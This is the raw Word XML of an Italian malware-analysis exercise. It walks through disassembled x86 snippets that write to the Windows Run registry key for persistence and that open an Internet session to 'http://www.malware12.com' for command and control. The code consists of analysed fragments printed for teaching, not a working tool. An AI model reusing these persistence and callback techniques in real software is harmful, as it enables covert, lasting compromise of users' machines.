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3D29" w14:textId="22C380FD" w:rsidR="002D391D" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="00DB6D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Analisi Malware in assembly x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C3364" w14:textId="0AB959C4" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="002D391D" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qua</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono evidenziate le istruzioni e le chiamate di funzioni </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>relative</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="005E7A9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5E7A91" w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l codice assembly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C66AF" w14:textId="77777777" w:rsidR="005E7A91" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ottenere la Persistenza nel Registro di Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E616F30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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; samDesired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF383AB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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; ulOptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0EFB14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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>offset Subkey</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C324CD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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>HKEY_LOCAL_MACHINE ; hKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2167B3F3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call</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>esi ; RegOpenKeyExW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F4533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test</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE79CA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jnz</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>short loc_4028C5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7D448" w14:textId="77777777" w:rsidR="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo frammento di codice apre la chiave di registro </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Software\Microsoft\Windows\CurrentVersion\Run" </w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sotto </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_LOCAL_MACHINE </w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizzando la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RegOpenKeyExW. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236632B" w14:textId="55A49EF0" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se l'operazione ha successo, il programma continua ad eseguire ulteriori istruzioni per scrivere nel Registro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E871F9" w14:textId="3D01BE3A" w:rsidR="005E7A91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lea</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ecx, [esp+424h+Data]</w:t>
      </w:r>
      <w:r w:rsidR="00DB6D3C">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B74B0" w14:textId="69C4E38A" w:rsidR="00DB6D3C" w:rsidRDefault="00DB6D3C" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lea</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6D3C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> calcola un indirizzo e lo memorizza in un registro, ma non legge o scrive direttamente dalla memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38693BF1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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; lpString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D6844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mov</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>bl, 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105B8C4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call</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ds:lstrlenW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E1CA9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lea</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>edx, [eax+eax+2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE309F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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>edx</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; cbData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC2A90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mov</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>edx, [esp+428h+hKey]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489B83E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lea</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>eax, [esp+428h+Data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E0BDF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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>eax ; lpData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA52B1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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2FA56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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; Reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA8B44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lea</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ecx, [esp+434h+ValueName]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D67E7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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; lpValueName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827C53C" w14:textId="77777777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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>edx</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>; hKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6711B" w14:textId="1FB3941D" w:rsidR="005E7A91" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
        <w:t>ds:RegSetValueExW</w:t>
      </w:r>
      <w:r w:rsidR="000041A8">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="000041A8" w:rsidRPr="000041A8">
        <w:t xml:space="preserve">Chiama la funzione che permette di aggiungere nuovi valori </w:t>
      </w:r>
      <w:r w:rsidR="000041A8">
        <w:t>inseriti al registro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6949E" w14:textId="03B55985" w:rsidR="002D391D" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Questo frammento di codice scrive nell'entrata del Registro </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Software\Microsoft\Windows\CurrentVersion\Run" </w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizzando la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegSetValueExW</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. L'obiettivo è ottenere persistenza, facendo in modo che il malware venga eseguito ogni volta che il sistema si avvia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD505B2" w14:textId="77777777" w:rsidR="005E7A91" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Comunicazione su Internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010F819F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esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC6416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edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C88A17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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwFlags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D668173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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; lpszProxyBypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70810499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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; lpszProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A4A09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1</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwAccessType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16F6D6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offset szAgent</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; "Internet Explorer 8.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E085918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call</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>ds:InternetOpenA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C3F33B" w14:textId="522FF20F" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo frammento di codice apre una sessione Internet utilizzando la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InternetOpenA</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Il client software utilizzato per la connessione ad Internet è specificato come "</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Internet Explorer 8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44079994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mov</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>edi, ds:InternetOpenUrlA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729BA7D7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mov</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>esi, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882E495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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087FD2C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80000000h</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwFlags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08610A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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; dwHeadersLength</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187FB798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0</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; lpszHeaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2F88A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offset szUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; "http://www.malware12.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF5BA6C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push</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>esi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>; hInternet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD977A" w14:textId="77777777" w:rsidR="005E7A91" w:rsidRPr="002D391D" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>edi ; InternetOpenUrlA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA8FFC8" w14:textId="77777777" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questo frammento di codice configura l'URL ("</w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.malware12.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">") e utilizza la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InternetOpenUrlA</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> per scaricare dati da tale URL. Il malware tenta di connettersi a questo indirizzo per eseguire azioni di comando e controllo o scaricare componenti aggiuntivi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44697B0A" w14:textId="77777777" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="005E7A91" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566526D3" w14:textId="7BDB4902" w:rsidR="005E7A91" w:rsidRPr="005E7A91" w:rsidRDefault="002D391D" w:rsidP="005E7A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In pratica</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> il malware ottiene persistenza scrivendo nel Registro di Windows e comunica con un server remoto tramite una sessione Internet, utilizzando "</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Internet Explorer 8.0</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" come client software. L'URL a cui tenta di connettersi è "</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="002D391D">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.malware12.com</w:t>
      </w:r>
      <w:r w:rsidR="005E7A91" w:rsidRPr="005E7A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005E7A91" w:rsidRPr="005E7A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CB"/>
    <w:rsid w:val="000041A8"/>
    <w:rsid w:val="002D391D"/>
    <w:rsid w:val="005B356A"/>
    <w:rsid w:val="005E7A91"/>
    <w:rsid w:val="00780DAB"/>
    <w:rsid w:val="00B957CB"/>
    <w:rsid w:val="00D75998"/>
    <w:rsid w:val="00D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3FDD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F3B1EF8E-8E30-420D-BE89-35B87783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499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2380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4212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2447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779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1542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073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215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4827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571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581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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-04T14:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-04T14:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>